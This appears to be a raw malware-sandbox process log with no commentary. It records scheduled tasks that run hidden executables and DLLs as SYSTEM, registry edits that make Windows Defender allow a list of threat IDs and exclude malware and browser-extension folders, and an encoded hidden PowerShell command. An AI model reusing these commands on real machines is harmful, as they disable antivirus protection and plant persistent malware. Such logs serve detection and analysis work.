"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1112 -ip 1112
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160514221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x9b9f88,0x9b9f94,0x9b9fa0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1920
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe\" z0 /KNdids 757674 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1324
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe z0 /KNdids 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFRDoStOp" /SC once /ST 03:14:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFRDoStOp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFRDoStOp"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 00:39:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe\" Wy /HVCTdidQB 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe Wy /HVCTdidQB 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5936 -ip 5936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 904
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\yPccvN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\zdIGiNQ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\jgEFQAg.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\OfKdOSY.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\GnpHogS.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\IzTFYtH.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 00:30:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\rWidLVjT\zqNgPWe.dll\",#1 /CwPdidj 757674" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\rWidLVjT\zqNgPWe.dll",#1 /CwPdidj 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\rWidLVjT\zqNgPWe.dll",#1 /CwPdidj 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 2012
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OyrSf1" /SC once /ST 03:11:33 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
C:\Windows\SysWOW64\schtasks.exe
